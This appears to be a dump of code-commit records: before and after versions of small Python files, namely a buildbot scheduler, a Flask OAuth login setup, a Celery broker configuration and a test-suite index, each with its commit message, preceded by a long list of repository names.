mkuzmin/vagrant,zsjohny/vagrant,ferventcoder/vagrant,sni/vagrant,patrys/vagrant,ArloL/vagrant,tomfanning/vagrant,channui/vagrant,wangfakang/vagrant,muhanadra/vagrant,jkburges/vagrant,rivy/vagrant,muhanadra/vagrant,krig/vagrant,Ninir/vagrant,tbarrongh/vagrant,johntron/vagrant,petems/vagrant,signed8bit/vagrant,carlosefr/vagrant,Chhunlong/vagrant,Ninir/vagrant,loren-osborn/vagrant,fnewberg/vagrant,Endika/vagrant,jtopper/vagrant,kamigerami/vagrant,tjanez/vagrant,mitchellh/vagrant,darkn3rd/vagrant,tjanez/vagrant,tjanez/vagrant,Chhunlong/vagrant,bheuvel/vagrant,sax/vagrant,webcoyote/vagrant,philwrenn/vagrant,gajdaw/vagrant,tschortsch/vagrant,genome21/vagrant,tjanez/vagrant,fnewberg/vagrant,rivy/vagrant,krig/vagrant,vamegh/vagrant,tomfanning/vagrant,sferik/vagrant,kamigerami/vagrant,pwnall/vagrant,tknerr/vagrant,darkn3rd/vagrant,Sgoettschkes/vagrant,PatOShea/vagrant,Avira/vagrant,MiLk/vagrant,h4ck3rm1k3/vagrant,cgvarela/vagrant,gitebra/vagrant,apertoso/vagrant,jmanero/vagrant,darkn3rd/vagrant,p0deje/vagrant,chrisvire/vagrant,philoserf/vagrant,sni/vagrant,aaam/vagrant,jean/vagrant,jkburges/vagrant,juiceinc/vagrant,taliesins/vagrant,PatrickLang/vagrant,zsjohny/vagrant,h4ck3rm1k3/vagrant,janek-warchol/vagrant,gitebra/vagrant,miguel250/vagrant,apertoso/vagrant,teotihuacanada/vagrant,Chhed13/vagrant,p0deje/vagrant,jkburges/vagrant,zsjohny/vagrant,sideci-sample/sideci-sample-vagrant,fnewberg/vagrant,doy/vagrant,Avira/vagrant,bshurts/vagrant,msabramo/vagrant,taliesins/vagrant,doy/vagrant,vamegh/vagrant,Chhunlong/vagrant,krig/vagrant,dustymabe/vagrant,kalabiyau/vagrant,ArloL/vagrant,aaam/vagrant,jmanero/vagrant,crashlytics/vagrant,gajdaw/vagrant,legal90/vagrant,signed8bit/vagrant,justincampbell/vagrant,miguel250/vagrant,denisbr/vagrant,nickryand/vagrant,rivy/vagrant,mkuzmin/vagrant,denisbr/vagrant,sax/vagrant,Endika/vagrant,evverx/vagrant,Sgoettschkes/vagrant,mkuzmin/vagrant,senglin/vagrant,gpkfr/vagrant,lonniev/vagrant,PatOShea/vagrant,shtouff/vagrant,mephaust/vagrant,kalabiyau/vagrant,tomfanning/vagrant,juiceinc/vagrant,invernizzi-at-google/vagrant,otagi/vagrant,chrisvire/vagrant,bshurts/vagrant,wangfakang/vagrant,crashlytics/vagrant,bmhatfield/vagrant,muhanadra/vagrant,samphippen/vagrant,miguel250/vagrant,dharmab/vagrant,jean/vagrant,wkolean/vagrant,sferik/vagrant,dharmab/vagrant,benh57/vagrant,carlosefr/vagrant,philwrenn/vagrant,rivy/vagrant,bryson/vagrant,loren-osborn/vagrant,samphippen/vagrant,cgvarela/vagrant,nickryand/vagrant,johntron/vagrant,sax/vagrant,lonniev/vagrant,otagi/vagrant,tschortsch/vagrant,modulexcite/vagrant,ianmiell/vagrant,shtouff/vagrant,dustymabe/vagrant,benizi/vagrant,philoserf/vagrant,mwrock/vagrant,Avira/vagrant,benizi/vagrant,aaam/vagrant,tschortsch/vagrant,iNecas/vagrant,vamegh/vagrant,dustymabe/vagrant,ArloL/vagrant,aneeshusa/vagrant,denisbr/vagrant,kamigerami/vagrant,gpkfr/vagrant,patrys/vagrant,tbriggs-curse/vagrant,msabramo/vagrant,Endika/vagrant,benh57/vagrant,nickryand/vagrant,krig/vagrant,loren-osborn/vagrant,BlakeMesdag/vagrant,TheBigBear/vagrant,kalabiyau/vagrant,benh57/vagrant,mwarren/vagrant,mpoeter/vagrant,jhoblitt/vagrant,glensc/vagrant,gajdaw/vagrant,jtopper/vagrant,PatOShea/vagrant,lonniev/vagrant,petems/vagrant,obnoxxx/vagrant,jfchevrette/vagrant,bheuvel/vagrant,gitebra/vagrant,chrisroberts/vagrant,bheuvel/vagrant,jmanero/vagrant,Chhunlong/vagrant,juiceinc/vagrant,jtopper/vagrant,chrisvire/vagrant,dharmab/vagrant,lukebakken/vagrant,msabramo/vagrant,kalabiyau/vagrant,gpkfr/vagrant,muhanadra/vagrant,doy/vagrant,myrjola/vagrant,wangfakang/vagrant,juiceinc/vagran
t,evverx/vagrant,genome21/vagrant,jhoblitt/vagrant,mwrock/vagrant,theist/vagrant,fnewberg/vagrant,justincampbell/vagrant,wangfakang/vagrant,tbarrongh/vagrant,bryson/vagrant,jfchevrette/vagrant,chrisroberts/vagrant,jfchevrette/vagrant,wkolean/vagrant,janek-warchol/vagrant,philoserf/vagrant,invernizzi-at-google/vagrant,mephaust/vagrant,senglin/vagrant,chrisvire/vagrant,stephancom/vagrant,petems/vagrant,jhoblitt/vagrant,shtouff/vagrant,ferventcoder/vagrant,legal90/vagrant,denisbr/vagrant,obnoxxx/vagrant,benizi/vagrant,janek-warchol/vagrant,loren-osborn/vagrant,PatrickLang/vagrant,samphippen/vagrant,lukebakken/vagrant,aneeshusa/vagrant,kamazee/vagrant,webcoyote/vagrant,gbarberi/vagrant,mpoeter/vagrant,marxarelli/vagrant,johntron/vagrant,genome21/vagrant,tknerr/vagrant,myrjola/vagrant,mwarren/vagrant,modulexcite/vagrant,channui/vagrant,MiLk/vagrant,zsjohny/vagrant,signed8bit/vagrant,blueyed/vagrant,stephancom/vagrant,jberends/vagrant,modulexcite/vagrant,philoserf/vagrant,marxarelli/vagrant,carlosefr/vagrant,channui/vagrant,myrjola/vagrant,vamegh/vagrant,jberends/vagrant,kamazee/vagrant,marxarelli/vagrant,bmhatfield/vagrant,ianmiell/vagrant,mephaust/vagrant,mitchellh/vagrant,mpoeter/vagrant,gbarberi/vagrant,benizi/vagrant,mpoeter/vagrant,apertoso/vagrant,genome21/vagrant,philwrenn/vagrant,pwnall/vagrant,chrisroberts/vagrant,webcoyote/vagrant,bryson/vagrant,webcoyote/vagrant,jkburges/vagrant,sideci-sample/sideci-sample-vagrant,ianmiell/vagrant,ferventcoder/vagrant,teotihuacanada/vagrant,gpkfr/vagrant,jean/vagrant,theist/vagrant,crashlytics/vagrant,pwnall/vagrant,bshurts/vagrant,sni/vagrant,mwrock/vagrant,marxarelli/vagrant,modulexcite/vagrant,otagi/vagrant,dhoer/vagrant,lukebakken/vagrant,crashlytics/vagrant,PatrickLang/vagrant,Chhed13/vagrant,tbriggs-curse/vagrant,jfchevrette/vagrant,teotihuacanada/vagrant,TheBigBear/vagrant,jberends/vagrant,Avira/vagrant,jean/vagrant,PatrickLang/vagrant,ianmiell/vagrant,glensc/vagrant,senglin/vagrant,legal90/vagrant,sferik/vagrant,petems/vagrant,philwrenn/vagrant,bdwyertech/vagrant,kamigerami/vagrant,msabramo/vagrant,dhoer/vagrant,jmanero/vagrant,legal90/vagrant,stephancom/vagrant,tknerr/vagrant,taliesins/vagrant,senglin/vagrant,sax/vagrant,patrys/vagrant,invernizzi-at-google/vagrant,dharmab/vagrant,mitchellh/vagrant,clinstid/vagrant,lonniev/vagrant,p0deje/vagrant,wkolean/vagrant,taliesins/vagrant,theist/vagrant,miguel250/vagrant,tbarrongh/vagrant,bdwyertech/vagrant,bryson/vagrant,nickryand/vagrant,blueyed/vagrant,mkuzmin/vagrant,tbriggs-curse/vagrant,dustymabe/vagrant,sideci-sample/sideci-sample-vagrant,tomfanning/vagrant,justincampbell/vagrant,iNecas/vagrant,patrys/vagrant,dhoer/vagrant,johntron/vagrant,TheBigBear/vagrant,MiLk/vagrant,apertoso/vagrant,samphippen/vagrant,jtopper/vagrant,justincampbell/vagrant,pwnall/vagrant,Sgoettschkes/vagrant,invernizzi-at-google/vagrant,dhoer/vagrant,h4ck3rm1k3/vagrant,clinstid/vagrant,doy/vagrant,carlosefr/vagrant,aaam/vagrant,cgvarela/vagrant,mephaust/vagrant,cgvarela/vagrant,shtouff/vagrant,chrisroberts/vagrant,janek-warchol/vagrant,otagi/vagrant,bdwyertech/vagrant,TheBigBear/vagrant,aneeshusa/vagrant,Chhed13/vagrant,jhoblitt/vagrant,mwarren/vagrant,mitchellh/vagrant,bdwyertech/vagrant,obnoxxx/vagrant,tschortsch/vagrant,Chhed13/vagrant,evverx/vagrant,Ninir/vagrant,mwarren/vagrant,BlakeMesdag/vagrant,Sgoettschkes/vagrant,aneeshusa/vagrant,jberends/vagrant,h4ck3rm1k3/vagrant,BlakeMesdag/vagrant,clinstid/vagrant,tbarrongh/vagrant,stephancom/vagrant,PatOShea/vagrant,sni/vagrant,kamazee/vagrant,blueyed/vagrant,theist/vagrant,k
amazee/vagrant,signed8bit/vagrant,bheuvel/vagrant,wkolean/vagrant,iNecas/vagrant,gbarberi/vagrant,myrjola/vagrant,benh57/vagrant,Endika/vagrant,lukebakken/vagrant,gitebra/vagrant,tknerr/vagrant,blueyed/vagrant,teotihuacanada/vagrant,ArloL/vagrant,ferventcoder/vagrant,darkn3rd/vagrant,bmhatfield/vagrant,tbriggs-curse/vagrant,gbarberi/vagrant,bshurts/vagrant,mwrock/vagrant
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
Buildbot: Add a scheduler for the master branch to run
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
<commit_before>"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
<commit_msg>Buildbot: Add a scheduler for the master branch to run<commit_after>
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
Buildbot: Add a scheduler for the master branch to run"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
<commit_before>"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
<commit_msg>Buildbot: Add a scheduler for the master branch to run<commit_after>"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
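A minimal sketch of how get_schedulers is typically wired into a buildbot master.cfg; the surrounding keys follow standard buildbot conventions and are not part of this commit:
# master.cfg (sketch)
from buildbot_config.master.schedulers import get_schedulers
c = BuildmasterConfig = {}
c['schedulers'] = get_schedulers()
# A builder named "vagrant-master" must also be registered in
# c['builders'] for the SingleBranchScheduler above to trigger anything.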
9e6621ac7e4f07b9272ddb144aebbb75826d2405
|
src/flock.py
|
src/flock.py
|
#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
|
#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOOK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/oauth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.tokengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
Switch to Flask, add oauth
|
Switch to Flask, add oauth
|
Python
|
agpl-3.0
|
DavidJFelix/hatchit,DavidJFelix/hatchit,DavidJFelix/hatchit
|
#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
Switch to Flask, add oauth
|
#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOOK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/oauth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.tokengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
<commit_before>#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
<commit_msg>Switch to Flask, add oauth<commit_after>
|
#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOOK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/oauth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.tokengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
Switch to Flask, add oauth#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOOK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/oauth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.tokengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
<commit_before>#!/usr/bin/env python
import cherrypy
from jinja2 import Environment, FileSystemLoader
j2_env = Environment(loader = FileSystemLoader('templates'))
class Root(object):
@cherrypy.expose
def index(self):
template = j2_env.get_template('base.html')
return template.render()
cherrypy.config.update('app.config')
cherrypy.tree.mount(Root(), '/', 'app.config')
cherrypy.engine.start()
cherrypy.engine.block()
<commit_msg>Switch to Flask, add oauth<commit_after>#!/usr/bin/env python
from flask import Flask, redirect, render_template, request, session, url_for
from flask_oauthlib.client import OAuth, OAuthException
app = Flask(__name__)
app.config['FACEBOOK_APP_ID'] = ''
app.config['FACEBOOK_APP_SECRET'] = ''
app.config['GOOGLE_APP_ID'] = ''
app.config['GOOGLE_APP_SECRET'] = ''
app.secret_key = 'development'
oauth = OAuth(app)
facebook = oauth.remote_app(
'facebook',
consumer_key = app.config.get('FACEBOOK_APP_ID'),
consumer_secret = app.config.get('FACEBOOK_APP_SECRET'),
request_token_params = {'scope' : 'email'},
base_url = 'https://graph.facebook.com',
request_token_url = None,
access_token_url = '/oauth/access_token',
authorize_url = 'https://www.facebook.com/dialog/oauth'
)
google = oauth.remote_app(
'google',
consumer_key = app.config.get('GOOGLE_APP_ID'),
consumer_secret = app.config.get('GOOGLE_APP_SECRET'),
request_token_params = {'scope' : 'https://www.googleapis.com/auth/userinfo.email'},
base_url = 'https://www.googleapis.com/oauth2/v1/',
request_token_url = None,
access_token_url = 'https://accounts.google.com/o/oauth2/token',
authorize_url = 'https://accounts.google.com/o/oauth2/auth'
)
@app.route('/')
def hello_world():
return render_template('base.html')
@facebook.tokengetter
def get_facebook_oauth_token():
return session.get('facebook_token')
@google.tokengetter
def get_google_oauth_token():
return session.get('google_token')
if __name__ == '__main__':
app.run()
|
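The remote apps above only configure the providers; a login flow still needs authorize/callback routes. A minimal sketch following the usual flask-oauthlib pattern (route paths and endpoint names are hypothetical):
@app.route('/login/facebook')
def facebook_login():
    # Redirect the user to Facebook's OAuth dialog.
    return facebook.authorize(callback=url_for('facebook_authorized', _external=True))
@app.route('/login/facebook/authorized')
def facebook_authorized():
    resp = facebook.authorized_response()
    if resp is None or isinstance(resp, OAuthException):
        return 'Access denied'
    # flask-oauthlib tokengetters return (token, secret) pairs.
    session['facebook_token'] = (resp['access_token'], '')
    return redirect(url_for('hello_world'))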
5f63a4cddc1157e1b0cb085562ee16e55f1c88b5
|
cesium/celery_app.py
|
cesium/celery_app.py
|
from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
Allow broker to be overridden
|
Allow broker to be overridden
|
Python
|
bsd-3-clause
|
mltsp/mltsp,acrellin/mltsp,bnaul/mltsp,bnaul/mltsp,bnaul/mltsp,acrellin/mltsp,mltsp/mltsp,mltsp/mltsp,acrellin/mltsp,acrellin/mltsp,mltsp/mltsp,bnaul/mltsp,mltsp/mltsp,bnaul/mltsp,bnaul/mltsp,acrellin/mltsp,acrellin/mltsp,mltsp/mltsp
|
from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
Allow broker to be overridden
|
from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
<commit_before>from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
<commit_msg>Allow broker to be overridden<commit_after>
|
from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
Allow broker to be overriddenfrom celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
<commit_before>from celery import Celery
from cesium import _patch_celery
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': 'amqp://guest@localhost//'
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
<commit_msg>Allow broker to be overridden<commit_after>from celery import Celery
from cesium import _patch_celery
import os
celery_config = {
'CELERY_ACCEPT_CONTENT': ['pickle'],
'CELERY_IMPORTS': ['cesium', 'cesium._patch_celery', 'cesium.celery_tasks'],
'CELERY_RESULT_BACKEND': 'amqp',
'CELERY_RESULT_SERIALIZER': 'pickle',
'CELERY_TASK_SERIALIZER': 'pickle',
'INSTALLED_APPS': ['cesium'],
'CELERY_BROKER': os.environ.get('CELERY_BROKER', 'amqp://guest@localhost//')
}
app = Celery('cesium', broker=celery_config['CELERY_BROKER'])
app.config_from_object(celery_config)
|
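With this change the broker can be overridden from the environment; a minimal sketch (the broker URL is hypothetical). Note the variable must be set before the module is imported, since the URL is read at import time:
import os
os.environ['CELERY_BROKER'] = 'amqp://guest@rabbitmq:5672//'
from cesium.celery_app import app  # picks up the override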
a17aade30c5925ba40eacfa2ab2a067a9141aa84
|
tests/__init__.py
|
tests/__init__.py
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
Make run_tests run all tests if no arguments are provided.
|
Make run_tests run all tests if no arguments are provided.
|
Python
|
bsd-3-clause
|
BGCX262/zvm-hg-to-git,BGCX262/zvm-hg-to-git
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
Make run_tests run all tests if no arguments are provided.
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
<commit_before>#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
<commit_msg>Make run_tests run all tests if no arguments are provided.<commit_after>
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
Make run_tests run all tests if no arguments are provided.#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
<commit_before>#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests" )
<commit_msg>Make run_tests run all tests if no arguments are provided.<commit_after>#
# For the license of this file, please consult the LICENSE file in the
# root directory of this distribution.
#
# All tests in the test suite.
__all__ = ( "bitfield_tests", "zscii_tests", "lexer_tests", "glk_tests" )
|
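A sketch of the run_tests behaviour the commit message describes, assuming the runner falls back to tests.__all__ when no suite names are passed (run_tests itself is not shown in this record):
import sys
import unittest
import tests
# Use every suite listed in tests.__all__ when no names are given.
names = sys.argv[1:] or list(tests.__all__)
suite = unittest.defaultTestLoader.loadTestsFromNames(
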